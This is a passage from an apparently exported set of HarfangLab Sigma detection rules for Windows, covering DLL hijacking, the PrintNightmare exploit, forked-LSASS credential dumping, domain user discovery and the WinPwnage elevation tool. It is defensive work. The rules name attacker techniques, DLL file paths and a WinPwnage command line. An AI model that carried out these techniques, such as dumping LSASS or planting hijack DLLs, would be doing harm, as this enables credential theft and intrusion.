high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5e3e1e8-5937-4413-a606-893a66c8dbdc",
"rule_name": "DLL Hijacking via Defrag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Defrag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5f40316-6c92-4983-b686-64dbfc197b4e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072303Z",
"creation_date": "2026-03-23T11:45:34.072305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072309Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/calebstewart/CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_possible_printnightmare_exploit.yml",
"content": "title: Possible PrintNightmare Privilege Escalation Exploit\nid: f5f40316-6c92-4983-b686-64dbfc197b4e\ndescription: |\n Detects exploitation of the PrintNightmare vulnerability (CVE-2021-1675) by the creation of a DLL used in common public PoCs.\n The Windows Print Spooler service is a critical component present on all Windows systems that manages print queues and is an attractive target for attackers due to its privileged nature.\n It is recommended to verify the origin of detected suspicious DLL, examine Windows Event logs for Print Spooler activity, and ensure all patches for CVE-2021-1675 are installed.\nreferences:\n - https://github.com/calebstewart/CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2022/09/29\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1547.012\n - cve.2021-1675\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Temp\\nightmare.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5f40316-6c92-4983-b686-64dbfc197b4e",
"rule_name": "Possible PrintNightmare Privilege Escalation Exploit",
"rule_description": "Detects exploitation of the PrintNightmare vulnerability (CVE-2021-1675) by the creation of a DLL used in common public PoCs.\nThe Windows Print Spooler service is a critical component present on all Windows systems that manages print queues and is an attractive target for attackers due to its privileged nature.\nIt is recommended to verify the origin of detected suspicious DLL, examine Windows Event logs for Print Spooler activity, and ensure all patches for CVE-2021-1675 are installed.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f637a7d1-4033-423f-9039-21c145a13eb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078116Z",
"creation_date": "2026-03-23T11:45:34.078118Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078123Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D4stiny/ForkPlayground/",
"https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_fork_memory_dump.yml",
"content": "title: Possible LSASS Forked Process Accessed\nid: f637a7d1-4033-423f-9039-21c145a13eb2\ndescription: |\n Detects an access to an lsass.exe process that is itself a child of lsass.exe.\n Adversaries may create a fork of the lsass.exe process and dump its memory instead of accessing the original lsass.exe memory as a way to bypass detection.\n It is recommended to analyze the source process for malicious behavior, such as accessing both lsass.exe processes or dropping suspicious files to disk.\nreferences:\n - https://github.com/D4stiny/ForkPlayground/\n - https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/02/13\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetProcessImage|endswith: '\\lsass.exe'\n TargetProcessParentImage|endswith: '\\lsass.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n filter_taskmgr:\n ProcessImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n filter_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_ccmexec:\n ProcessImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_landesk:\n ProcessProcessName: 'SoftMon.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LANDesk Software, Inc.'\n - 'Ivanti, Inc.' # bought by Ivanti\n\n exclusion_nvidia:\n ProcessImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\nvbl.inf_amd64_*\\NVWMI\\nvWmi64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_rdrleakdiag:\n ProcessCommandLine:\n - '*\\RdrLeakDiag.exe -p * -h 25 -tp 2 -cleanup -watson -unnamed'\n - '*\\RdrLeakDiag.exe -p * -h 25 -tp 2 -cleanup -watson -unnamed -wait 240'\n ProcessParentImage: '?:\\Windows\\System32\\taskhostw.exe'\n\n exclusion_rhs:\n ProcessImage: '?:\\Windows\\Cluster\\rhs.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost_werfault:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f637a7d1-4033-423f-9039-21c145a13eb2",
"rule_name": "Possible LSASS Forked Process Accessed",
"rule_description": "Detects an access to an lsass.exe process that is itself a child of lsass.exe.\nAdversaries may create a fork of the lsass.exe process and dump its memory instead of accessing the original lsass.exe memory as a way to bypass detection.\nIt is recommended to analyze the source process for malicious behavior, such as accessing both lsass.exe processes or dropping suspicious files to disk.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f6687c5a-692b-4cd8-8ca8-3ee859842043",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624167Z",
"creation_date": "2026-03-23T11:45:34.624169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624173Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_net_user_domain.yml",
"content": "title: Domain User List Discovered\nid: f6687c5a-692b-4cd8-8ca8-3ee859842043\ndescription: |\n Detect the execution of the \"net user\" command with the \"/domain\" parameter.\n This command is often used by attackers to list all users in an Active Directory domain during discovery phase.\n It is recommended to analyze the grandparent process and its context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2021/04/28\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine:\n - '?:\\Windows\\system32\\net1 user /do'\n - '?:\\Windows\\system32\\net1 user /dom'\n - '?:\\Windows\\system32\\net1 user /doma'\n - '?:\\Windows\\system32\\net1 user /domai'\n - '?:\\Windows\\system32\\net1 user /domain'\n - '?:\\Windows\\system32\\net1 users /do'\n - '?:\\Windows\\system32\\net1 users /dom'\n - '?:\\Windows\\system32\\net1 users /doma'\n - '?:\\Windows\\system32\\net1 users /domai'\n - '?:\\Windows\\system32\\net1 users /domain'\n\n exclusion_zabbix:\n ProcessAncestors|contains: '?:\\Program Files\\Zabbix Agent\\zabbix_agentd.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f6687c5a-692b-4cd8-8ca8-3ee859842043",
"rule_name": "Domain User List Discovered",
"rule_description": "Detect the execution of the \"net user\" command with the \"/domain\" parameter.\nThis command is often used by attackers to list all users in an Active Directory domain during discovery phase.\nIt is recommended to analyze the grandparent process and its context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f68b1f94-3a14-472e-84c9-c96714963f76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076222Z",
"creation_date": "2026-03-23T11:45:34.076224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_reset.yml",
"content": "title: DLL Hijacking via reset.exe\nid: f68b1f94-3a14-472e-84c9-c96714963f76\ndescription: |\n Detects potential Windows DLL Hijacking via reset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'reset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\licensemanagerapi.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ReAgent.dll'\n - '\\REGAPI.dll'\n - '\\ResetEngine.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\tbs.dll'\n - '\\utildll.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\wevtapi.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WINSTA.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f68b1f94-3a14-472e-84c9-c96714963f76",
"rule_name": "DLL Hijacking via reset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via reset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f69bcc31-c92a-4c96-b91e-5cf99664b104",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601716Z",
"creation_date": "2026-03-23T11:45:34.601719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601727Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://twitter.com/sbousseaden/status/1213116771663777799",
"https://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure",
"https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_credwiz.yml",
"content": "title: DLL Hijacking via credwiz.exe\nid: f69bcc31-c92a-4c96-b91e-5cf99664b104\ndescription: |\n Detects potential Windows DLL Hijacking via credwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate credwiz executable alongside a malicious New.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://twitter.com/sbousseaden/status/1213116771663777799\n - https://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure\n - https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'credwiz.exe'\n ImageLoaded|endswith:\n - '\\New.dll'\n - '\\DUser.dll'\n - '\\msctfmonitor.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n\n filter_legitimate_image:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f69bcc31-c92a-4c96-b91e-5cf99664b104",
"rule_name": "DLL Hijacking via credwiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via credwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate credwiz executable alongside a malicious New.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f69e4e20-02c1-4ae3-bd22-b8388e34350f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076531Z",
"creation_date": "2026-03-23T11:45:34.076533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076537Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cipher.yml",
"content": "title: DLL Hijacking via cipher.exe\nid: f69e4e20-02c1-4ae3-bd22-b8388e34350f\ndescription: |\n Detects potential Windows DLL Hijacking via cipher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cipher.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\iertutil.dll'\n - '\\NTDSAPI.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f69e4e20-02c1-4ae3-bd22-b8388e34350f",
"rule_name": "DLL Hijacking via cipher.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cipher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f6fce5da-b097-4cf5-8047-19389b3d1f01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609909Z",
"creation_date": "2026-03-23T11:45:34.609913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609921Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/functions/elevate/elevateMethod3.py",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_winpwnage_pipe_usage.yml",
"content": "title: Winpwnage Elevation Tool Detected\nid: f6fce5da-b097-4cf5-8047-19389b3d1f01\ndescription: |\n Detects a suspicious command-line related to the usage of the Winpwnage elevation tool.\n WinPwnage is a post-exploitation tool used for privilege escalation, bypassing User Account Control (UAC), and executing unauthorized actions on Windows systems by leveraging known vulnerabilities and misconfigurations.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/functions/elevate/elevateMethod3.py\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2021/02/08\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPwnage\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\\\.\\pipe\\WinPwnagePipe\n Image|endswith: '\\cmd.exe'\n CommandLine|contains|all:\n - '/c '\n - 'echo'\n - '\\\\\\\\.\\pipe\\WinPwnagePipe'\n\n 